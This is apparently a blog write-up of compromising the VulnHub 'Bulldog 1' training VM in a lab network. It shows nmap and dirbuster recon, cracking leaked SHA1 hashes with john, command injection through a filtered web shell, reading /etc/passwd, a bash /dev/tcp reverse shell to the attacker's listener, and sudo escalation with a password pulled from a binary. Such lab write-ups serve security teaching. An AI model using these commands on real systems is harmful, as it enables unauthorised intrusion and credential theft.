Bulldog One – Writeup

Details

This machine is https://www.vulnhub.com/entry/bulldog-1,211/

Recon Phase

As with most machines, I first had to locate it on the network. So I started up nmap to do some host discovery

root@kali:~# nmap -sn 192.168.56.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-31 21:50 EDT
Nmap scan report for 192.168.56.1
Host is up (0.00031s latency).
MAC Address: 0A:00:27:00:00:00 (Unknown)
Nmap scan report for 192.168.56.2
Host is up (0.00022s latency).
MAC Address: 08:00:27:1F:84:07 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.3
Host is up (0.00043s latency).
MAC Address: 08:00:27:16:1D:5F (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 28.07 seconds

Now I know my target is running on 192.168.56.3 I can do a service discovery scan on it using nmap again

root@kali:~# nmap -sV 192.168.56.3
Nmap scan report for 192.168.56.3
Host is up (0.00013s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
23/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    WSGIServer 0.1 (Python 2.7.12)
8080/tcp open  http    WSGIServer 0.1 (Python 2.7.12)
MAC Address: 08:00:27:16:1D:5F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.06 seconds

The first thing I notice is that ssh is running on a non standard port of 23 instead of 22. Also there are 2 webservers running. I head over to the first one in browser by navigating to http://192.168.56.3

Screenshot 1

First I follow the link to /notice to see what is going on there

Screenshot 2

Well, there was nothing useful yet, so I grabbed dirbuster and set it up to try and find more directories

Screenshot 3

Once it finished there were a few more leads for me to dig into

Screenshot 4

First I head over to /admin and am presented with a login screen, but I have no creds at this point

Screenshot 5

So next I tried accessing the /dev url and see a link to a webshell

Screenshot 6

I instantly click on the webshell link as this could be perfect

Screenshot 7

Ah, So that didn't work yet, I need some creds. I started by pointing dirbuster at the /admin and /dev urls but it didn't find much of use

Screenshot 8 Screenshot 9 Screenshot 10 Screenshot 11

At this point I decided to go back to basics and inspect the html source of each page, eventually I find something interesting

Screenshot 12

"It's not like a hacker can do anything with a hash". It was time to prove him very, very wrong, first I formed a username:hash list and called it crack.txt

alan:6515229daf8dbdc8b89fed2e60f107433da5f2cb
william:38882f3b81f8f2bc47d9f3119155b05f954892fb
malik:c6f7e34d5d08ba4a40dd5627508ccb55b425e279
kevin:0e6ae9fe8af1cd4192865ac97ebf6bda414218a9
ashley:553d917a396414ab99785694afd51df3a8a8a3e0
nick:ddf45997a7e18a25ad5f5cf222da64814dd060d5
sarah:d8b8dd5e7f000b8dea26ef8428caf38c04466b3e

Now I ran one through a hash identifier and found out the are SHA1 hashes, so i fired up john and applied rockyou.txt to try and crack them

root@kali:~# john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA1
Loaded 7 password hashes with no different salts (Raw-SHA1 [SHA1 128/128 SSE2 4x])
Press 'q' or Ctrl-C to abort, almost any other key for status
bulldog          (nick)
bulldoglover     (sarah)
Use the "--show" option to display all of the cracked passwords reliably
Session completed

So now I have 2 sets of creds of nick:bulldog and sarah:bulldoglover. So I headed over to /admin and logged in with nick:bulldog

Screenshot 13

Now I was logged in I went back to the webshell to see if I had access now

Screenshot 14

so I began to mess around with the webshell

$ pwd
/home/django/bulldog
$ cd ..
INVALID COMMAND. I CAUGHT YOU HACKER!

At this point I considered that may be the protections aren't very good

$ pwd && cd .. && pwd
/home/django/bulldog
/home/django

So the shell is vulnerable to command injection by joining commands with &&, next I notice I can use "cat" so I try to read the user list

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
bulldogadmin:x:1000:1000:bulldogadmin,,,:/home/bulldogadmin:/bin/bash
django:x:1001:1001:,,,:/home/django:/bin/bash
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin

Now I have a user list it gives me a target for priv esc, the bulldogadmin account looks promising, I also try to read the shadow file, just encase

$ cat /etc/shadow

Screenshot 15

Well, I didn't really expect that to work anyway. I went to find out which user I currently am

$ pwd && whoami
/home/django/bulldog
django

So I am the django user, lets see if I can open a reverse shell. First I need a listener to receive it

root@kali:~# nc -lp 12345

Then back on the web terminal

$ echo 'bash -i >& /dev/tcp/192.168.56.4/12345 0>&1' | bash

This time using pipe and echo to avoid the restrictions. Then back on my nc listener

bash: cannot set terminal process group (921): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
bash: /root/.bashrc: Permission denied
django@bulldog:/home/django/bulldog$

Now I have a shell I can start digging around, mainly towards the bulldogadmin accounts home

django@bulldog:/home/django/bulldog$ cd /home
django@bulldog:/home$ ls -la
drwxr-xr-x  4 root         root         4096 Aug 24  2017 .
drwxr-xr-x 24 root         root         4096 Aug 26  2017 ..
drwxr-xr-x  5 bulldogadmin bulldogadmin 4096 Sep 21  2017 bulldogadmin
drwxr-xr-x  5 django       django       4096 Sep 21  2017 django
django@bulldog:/home$ cd bulldogadmin
django@bulldog:/home/bulldogadmin$ ls -la
drwxr-xr-x 5 bulldogadmin bulldogadmin 4096 Sep 21  2017 .
drwxr-xr-x 4 root         root         4096 Aug 24  2017 ..
-rw-r--r-- 1 bulldogadmin bulldogadmin  220 Aug 24  2017 .bash_logout
-rw-r--r-- 1 bulldogadmin bulldogadmin 3771 Aug 24  2017 .bashrc
drwx------ 2 bulldogadmin bulldogadmin 4096 Aug 24  2017 .cache
drwxrwxr-x 2 bulldogadmin bulldogadmin 4096 Sep 21  2017 .hiddenadmindirectory
drwxrwxr-x 2 bulldogadmin bulldogadmin 4096 Aug 25  2017 .nano
-rw-r--r-- 1 bulldogadmin bulldogadmin  655 Aug 24  2017 .profile
-rw-rw-r-- 1 bulldogadmin bulldogadmin   66 Aug 25  2017 .selected_editor
-rw-r--r-- 1 bulldogadmin bulldogadmin    0 Aug 24  2017 .sudo_as_admin_successful
-rw-rw-r-- 1 bulldogadmin bulldogadmin  217 Aug 24  2017 .wget-hsts

My attention was drawn by .hiddenadmindirectory so I started investigating it

django@bulldog:/home/bulldogadmin$ cd .hiddenadmindirectory
django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ ls -la
drwxrwxr-x 2 bulldogadmin bulldogadmin 4096 Sep 21  2017 .
drwxr-xr-x 5 bulldogadmin bulldogadmin 4096 Sep 21  2017 ..
-rw-r--r-- 1 bulldogadmin bulldogadmin 8728 Aug 26  2017 customPermissionApp
-rw-rw-r-- 1 bulldogadmin bulldogadmin  619 Sep 21  2017 note

Well this is interesting, first I looked at the note, then inspected the app

django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ cat note
Nick,
I'm working on the backend permission stuff. Listen, it's super prototype but I think it's going to work out great. Literally run the app, give your account password, and it will determine if you should have access to that file or not!
It's great stuff! Once I'm finished with it, a hacker wouldn't even be able to reverse it! Keep in mind that it's still a prototype right now. I am about to get it working with the Django user account. I'm not sure how I'll implement it for the others. Maybe the webserver is the only one who needs to have root access sometimes?
Let me know what you think of it!
-Ashley
django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ file customPermissionApp
customPermissionApp: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=c9f2333253302d74eff3da59653f82d28f9eb36f, not stripped
django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ strings customPermissionApp
<snip>
SUPERultH
imatePASH
SWORDyouH
CANTget
dH34%(
AWAVA
AUATL
[]A\A]A^A_
Please enter a valid username to use root privileges
    Usage: ./customPermissionApp <username>
sudo su root
<snip>

I trimmed the output of strings to only the bits which looked helpful as it was rather large. So what stands out here is the way the program can be used, the sudo su root. Another thing that is interesting is

SUPERultH
imatePASH
SWORDyouH
CANTget

Which when the Hs' are removed, and it is put onto one line reads

SUPERultimatePASSWORDyouCANTget

Well, I now have what looks like a password, and lots of hints which indicate it is to do with root, lets try it

django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$jango@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ sudo -l
su: must be run from a terminal

Ah, I can solve this one with a quick python script

django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ python -c "import pty;pty.spawn('/bin/bash')"
django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ sudo -l

When prompted for a password, I enter SUPERultimatePASSWORDyouCANTget

Matching Defaults entries for django on bulldog:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User django may run the following commands on bulldog:
    (ALL : ALL) ALL

This means I now have the box and can grab the flag

django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ sudo su
root@bulldog:/home/bulldogadmin/.hiddenadmindirectory# cd /root
root@bulldog:~# ls -la
drwx------  3 root root 4096 Sep 21  2017 .
drwxr-xr-x 24 root root 4096 Aug 26  2017 ..
-rw-------  1 root root  378 Sep 21  2017 .bash_history
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
-rw-r--r--  1 root root  288 Sep 21  2017 congrats.txt
drwxr-xr-x  2 root root 4096 Aug 24  2017 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Aug 24  2017 .selected_editor
-rw-------  1 root root 1065 Sep 21  2017 .viminfo
root@bulldog:~# cat congrats.txt
Congratulations on completing this VM :D That wasn't so bad was it?
Let me know what you thought on twitter, I'm @frichette_n
As far as I know there are two ways to get root. Can you find the other one?
Perhaps the sequel will be more challenging. Until next time, I hope you enjoyed!

And that is the machine completed, as the flag says there are 2 routes to root, I may reload this machine in future and look for the other way

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.